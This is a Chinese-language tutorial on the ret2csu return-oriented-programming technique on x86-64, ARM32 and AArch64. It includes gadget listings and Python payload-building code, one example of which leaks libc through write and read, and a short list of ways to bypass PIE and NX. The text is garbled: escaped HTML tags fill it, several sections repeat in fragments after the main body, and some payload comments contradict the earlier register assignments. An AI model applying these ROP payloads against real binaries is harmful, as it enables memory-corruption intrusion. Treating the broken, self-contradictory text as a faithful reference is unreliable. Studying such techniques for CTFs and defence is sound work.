x86与ARM架构下的ret2csu技术详解<\/h1>

1. x86架构下的ret2csu技术<\/h2>

1.1 基本原理<\/h3>
ret2csu技术利用了`__libc_csu_init<\/code>函数中的gadget来控制参数寄存器，主要解决x86-64架构下缺少直接控制rdx等寄存器的gadget的问题。<\/p>`

1.2 关键gadget分析<\/h3>
__libc_csu_init<\/code>函数包含两部分关键代码：<\/p>
第一部分 (pop部分 - 0x4012AA):<\/strong><\/p>
pop<\/span> rbx<\/span>
<\/span><\/span>pop<\/span> rbp<\/span>
<\/span><\/span>pop<\/span> r12<\/span>
<\/span><\/span>pop<\/span> r13<\/span>
<\/span><\/span>pop<\/span> r14<\/span>
<\/span><\/span>pop<\/span> r15<\/span>
<\/span><\/span>retn<\/span>
<\/span><\/span><\/code><\/pre>第二部分 (mov\/call部分 - 0x401290):<\/strong><\/p>
mov<\/span> rdx<\/span>, r14<\/span>
<\/span><\/span>mov<\/span> rsi<\/span>, r13<\/span>
<\/span><\/span>mov<\/span> edi<\/span>, r12d<\/span>
<\/span><\/span>call<\/span> qword<\/span> ptr<\/span> [r15<\/span>+<\/span>rbx<\/span>*8<\/span>]
<\/span><\/span>add<\/span> rbx<\/span>, 1<\/span>
<\/span><\/span>cmp<\/span> rbp<\/span>, rbx<\/span>
<\/span><\/span>jnz<\/span> short<\/span> loc_401290<\/span>
<\/span><\/span><\/code><\/pre>1.3 利用流程<\/h3>


通过pop部分设置寄存器值：<\/p>

rbx = 0<\/li>
rbp = 1 (确保rbx+1 == rbp)<\/li>
r12 = edi (第1个参数)<\/li>
r13 = rsi (第2个参数)<\/li>
r14 = rdx (第3个参数)<\/li>
r15 = 函数地址<\/li>
<\/ul>
<\/li>

跳转到mov\/call部分执行函数调用<\/p>
<\/li>

注意需要添加8字节填充(rsp+8)和56字节填充(7个pop)<\/p>
<\/li>
<\/ol>
1.4 示例利用代码<\/h3>
def<\/span> ret_csu<\/span>(r12, r13, r14, r15, last):
<\/span><\/span>    payload =<\/span> offset *<\/span> 'a'<\/span>  
<\/span><\/span>    payload +=<\/span> p64(first_csu) +<\/span> 'a'<\/span> *<\/span> 8<\/span>    # gadgets1地址<\/span>
<\/span><\/span>    payload +=<\/span> p64(0<\/span>) +<\/span> p64(1<\/span>)             # rbx=0, rbp=1<\/span>
<\/span><\/span>    payload +=<\/span> p64(r12)                    # call调用的地址<\/span>
<\/span><\/span>    payload +=<\/span> p64(r13) +<\/span> p64(r14) +<\/span> p64(r15)  # 三个参数寄存器<\/span>
<\/span><\/span>    payload +=<\/span> p64(second_csu)             # gadgets2地址<\/span>
<\/span><\/span>    payload +=<\/span> 'a'<\/span> *<\/span> 56<\/span>                    # pop出的padding<\/span>
<\/span><\/span>    payload +=<\/span> p64(last)                   # 函数最后的返回地址<\/span>
<\/span><\/span>    return<\/span> payload
<\/span><\/span><\/code><\/pre>1.5 为什么32位不适用<\/h3>
32位x86架构使用栈传参而非寄存器传参，且__libc_csu_init<\/code>函数中没有提供控制栈参数的gadget。<\/p>
2. ARM架构下的ret2csu技术<\/h2>
2.1 ARM基础<\/h3>
寄存器与传参方式<\/h4>

32位ARM: r0(第1参数), r1(第2), r2(第3), r3(第4), 超过4个使用栈传参<\/li>
关键指令:

LDR: 内存加载到寄存器<\/li>
STR: 寄存器存储到内存<\/li>
B\/BL\/BLX\/BX: 跳转指令<\/li>
<\/ul>
<\/li>
<\/ul>
环境配置<\/h4>

静态链接32位ARM: qemu-arm .\/程序名<\/code><\/li>
动态链接32位ARM: qemu-arm -L \/usr\/arm-linux-gnueabihf\/ .\/程序名<\/code><\/li>
调试: qemu-arm -g 1234 -L \/usr\/arm-linux-gnueabi\/ .\/程序名<\/code><\/li>
<\/ul>
2.2 ARM32 ret2csu利用<\/h3>
关键gadget示例<\/h4>
0<\/span>x00010500<\/span> : pop<\/span> {<\/span>r4<\/span>, r5<\/span>, r6<\/span>, r7<\/span>, r8<\/span>, sb<\/span>, sl<\/span>, pc<\/span>}<\/span>
<\/span><\/span>0<\/span>x000104e0<\/span> : mov<\/span> r2<\/span>, sb<\/span> ; mov r1, r8 ; mov r0, r7 ; ldr r3, [r5], #4 ; add r4, r4, #1 ; blx r3
<\/span><\/span><\/span><\/code><\/pre>利用流程<\/h4>


通过pop gadget设置寄存器:<\/p>

r7 = r0 (第1参数)<\/li>
r8 = r1 (第2参数)<\/li>
sb = r2 (第3参数)<\/li>
r5 = 函数地址<\/li>
<\/ul>
<\/li>

跳转到mov\/blx部分执行函数调用<\/p>
<\/li>
<\/ol>
2.3 示例利用代码<\/h3>
r4_r10_pc =<\/span> 0x00010500<\/span>  # pop gadget<\/span>
<\/span><\/span>again =<\/span> 0x000104e0<\/span>      # mov\/call gadget<\/span>
<\/span><\/span>
<\/span><\/span># 第一次调用: leak libc<\/span>
<\/span><\/span>payload =<\/span> flat([b<\/span>'a'<\/span>*<\/span>12<\/span>, r4_r10_pc, 0<\/span>, write, 1<\/span>, 1<\/span>, read, 4<\/span>, b<\/span>'a'<\/span>*<\/span>4<\/span>, pc])
<\/span><\/span>payload +=<\/span> flat([0<\/span>, read, 1<\/span>, 0<\/span>, bss, 0x10<\/span>, b<\/span>'a'<\/span>*<\/span>4<\/span>, again])
<\/span><\/span>payload +=<\/span> flat([b<\/span>'a'<\/span>*<\/span>4<\/span>]*<\/span>7<\/span>, ret_addr)
<\/span><\/span><\/code><\/pre>3. AArch64架构下的ret2csu<\/h2>
3.1 关键区别<\/h3>

使用x29(FP)和x30(LR)寄存器控制执行流<\/li>
栈结构更复杂，包含多个区域:

incoming\/outgoing stack arguments<\/li>
callee-saved registers区域<\/li>
local variables区域<\/li>
<\/ul>
<\/li>
<\/ul>
3.2 利用要点<\/h3>

控制x29(FP)和x30(LR)寄存器<\/li>
利用函数prologue\/epilogue中的栈操作gadget<\/li>
注意栈区域分配方向:

参数区域: 低地址→高地址<\/li>
局部变量: 高地址→低地址<\/li>
<\/ul>
<\/li>
<\/ol>
4. 防御与绕过<\/h2>
4.1 常见防御<\/h3>

栈保护(Stack Canary)<\/li>
PIE(位置无关执行)<\/li>
RELRO(重定位只读)<\/li>
<\/ul>
4.2 绕过方法<\/h3>

利用信息泄露绕过PIE<\/li>
通过ret2csu构造ROP链绕过NX<\/li>
多次利用控制执行流<\/li>
<\/ul>
5. 参考资源<\/h2>

ARM官方文档<\/li>
AAPCS64调用约定<\/li>
相关安全研究论文和博客<\/li>
<\/ul>

x86与ARM架构下的ret2csu技术详解<\/h1>

1. x86架构下的ret2csu技术<\/h2>

1.1 基本原理<\/h3> ret2csu技术利用了__libc_csu_init<\/code>函数中的gadget来控制参数寄存器，主要解决x86-64架构下缺少直接控制rdx等寄存器的gadget的问题。<\/p>

1.5 为什么32位不适用<\/h3> 32位x86架构使用栈传参而非寄存器传参，且__libc_csu_init<\/code>函数中没有提供控制栈参数的gadget。<\/p>

2.1 ARM基础<\/h3>

2.2 ARM32 ret2csu利用<\/h3>

3. AArch64架构下的ret2csu<\/h2>

4. 防御与绕过<\/h2>

4.2 绕过方法<\/h3> 利用信息泄露绕过PIE<\/li> 通过ret2csu构造ROP链绕过NX<\/li> 多次利用控制执行流<\/li> <\/ul> 5. 参考资源<\/h2> ARM官方文档<\/li> AAPCS64调用约定<\/li> 相关安全研究论文和博客<\/li> <\/ul>

5. 参考资源<\/h2> ARM官方文档<\/li> AAPCS64调用约定<\/li> 相关安全研究论文和博客<\/li> <\/ul>

1.1 基本原理<\/h3>
ret2csu技术利用了`__libc_csu_init<\/code>函数中的gadget来控制参数寄存器，主要解决x86-64架构下缺少直接控制rdx等寄存器的gadget的问题。<\/p>`

1.5 为什么32位不适用<\/h3>
32位x86架构使用栈传参而非寄存器传参，且`__libc_csu_init<\/code>函数中没有提供控制栈参数的gadget。<\/p>`

4.2 绕过方法<\/h3>

利用信息泄露绕过PIE<\/li>
通过ret2csu构造ROP链绕过NX<\/li>
多次利用控制执行流<\/li> <\/ul>
5. 参考资源<\/h2>

ARM官方文档<\/li>
AAPCS64调用约定<\/li>
相关安全研究论文和博客<\/li> <\/ul>

5. 参考资源<\/h2>

ARM官方文档<\/li>
AAPCS64调用约定<\/li>
相关安全研究论文和博客<\/li> <\/ul>